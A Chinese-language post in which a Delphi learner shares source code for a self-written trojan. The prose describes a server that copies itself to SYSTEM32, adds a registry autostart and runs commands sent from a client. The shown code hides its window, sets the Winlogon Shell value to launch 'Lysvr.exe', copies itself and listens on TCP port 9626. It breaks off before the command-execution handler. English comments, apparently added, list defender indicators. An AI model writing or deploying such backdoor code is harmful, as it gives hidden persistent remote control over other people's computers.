剛學電腦時很喜歡網絡安全,看著高手們寫的一個又一個攻擊工具,自己也總想努力學好編程,去寫屬於自己的程序。學Delphi快一年了,感覺什麼都沒學到,慚愧啊。今晚突然想學著寫木馬,於是手忙腳亂地敲了點代碼,超簡單,願自己能越寫越好!!! 程序跟傳統木馬一樣,分服務端和客戶端。運行服務端後會複製自身到SYSTEM32目錄下面,並在註冊表添加一個自動運行的啟動項,打開本機9626端口開始等待接收客戶端的數據。當接收到客戶端數據時就當作CMD命令去執行,最後把回顯傳送回客戶端。客戶端很簡單,跟服務端連接成功後,輸入命令點執行,正常的話就可以收到服務端的執行結果了。
源碼如下:
////Server.pas//////////////
unit UtMain;
////////////////////////////////////
//////////BY lanyus////////////////
////////Email:[email protected]////
////////QQ:231221////////////////
///部分代碼從網上收集///////////
////////////////////////////////
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, Registry, ScktComp, StdCtrls;
type
// Main (and only visible) form class of the server unit. It owns the listening
// socket component and declares the three event handlers implemented below.
TFmMain = class(TForm)
// Server socket component from ScktComp; FormCreate sets its port and activates it.
SS: TServerSocket;
// Memo control; no use of it is visible in this part of the listing.
Memo1: TMemo;
// Runs when the form is created: hides the form, writes the registry value,
// copies the executable and starts the listener (see the implementation).
procedure FormCreate(Sender: TObject);
// Handler taking the socket of a newly accepted connection; presumably wired to
// SS's accept event in the .dfm, which is not shown here.
procedure SSAccept(Sender: TObject; Socket: TCustomWinSocket);
// Handler taking the socket that has data to read; its implementation starts
// below and continues beyond this excerpt.
procedure SSClIEntRead(Sender: TObject; Socket: TCustomWinSocket);
private
{ Private declarations }
public
{ Public declarations }
end;
var
// The single form instance; FormCreate refers to it by this global name.
FmMain: TFmMain;
// Unit-level registry object; created and freed inside FormCreate only.
reg:TRegistry;
implementation
{$R *.dfm}
// Form-creation handler of the server part. In order, it:
//   1. hides the main form,
//   2. writes the 'Shell' value 'Explorer.exe Lysvr.exe' under HKEY_LOCAL_MACHINE,
//   3. copies the running executable to a file named 'Lysvr.exe' whose path is
//      built from the system-directory string,
//   4. starts the TServerSocket SS listening on TCP port 9626.
//
// Defender notes (all indicators below are taken from this listing):
//   - Persistence: a Winlogon 'Shell' value that names anything besides the
//     normal shell is a well-known logon-autostart indicator (MITRE ATT&CK
//     T1547.004). Alert on changes to that value and compare it to a baseline.
//   - File: an executable named 'Lysvr.exe' associated with the system directory.
//   - Network: an unexpected listener on TCP 9626; host firewalls that deny
//     unsolicited inbound connections block the channel.
//   - HKLM writes and writes into the system directory normally require
//     administrative rights, so least-privilege accounts limit steps 2 and 3.
procedure TFmMain.FormCreate(Sender: TObject);
var
sysdir:array[0..50] of char; // receives the system directory path (51 chars)
begin
Application.ShowMainForm:=False;
FmMain.Left:=-200; // run without showing a window (form is also moved off-screen)
reg:=TRegistry.Create;
reg.RootKey:=HKEY_LOCAL_MacHINE;
// Second argument True = create the key if it does not exist. The key string is
// kept exactly as it appears on the page; it names the Winlogon key.
reg.OpenKey('SoftWareMicrosoftWindows NTCurrentVersionWinlogon',true);
// Only rewrite the value when it does not already hold the expected string.
if reg.ReadString('Shell')<> 'Explorer.exe Lysvr.exe' then
reg.WriteString('Shell','Explorer.exe Lysvr.exe'); // create the boot-time autostart entry
reg.Free;
GetSystemDirectory(sysdir,50);
// Copy the running executable only if the target file is not already present;
// the final True asks CopyFile to fail rather than overwrite an existing file.
if not FileExists(sysdir+'Lysvr.exe') then
copyfile(Pchar(Application.exeName),pchar(sysdir+'Lysvr.exe'),true);
SS.Port:=9626;
// Any exception raised while activating the listener is silently discarded,
// so a failure to listen produces no message or log entry.
try
SS.Active:=True;
except
end;
end;
// Handler for a newly accepted connection: sends a fixed greeting string to the
// peer. No check of who the peer is appears in this handler.
// Defender note: this greeting is sent as the first bytes of every session on
// the listener port, so it can serve as a network signature for this sample.
procedure TFmMain.SSAccept(Sender: TObject; Socket: TCustomWinSocket);
begin
Socket.SendText('連接成功'); // on a new connection, send back '連接成功' ("connection succeeded")
end;
procedure TFmMain.SSClIEntRead(Sender: TObject; Socket: TCustomWinSocket);
var
RemoteCmd:string;
hReadPipe,hWritePipe:THandle;
si:STARTUPINFO;
lsa:SECURITY_ATTRIBUTES;
pi:PROCESS_INFO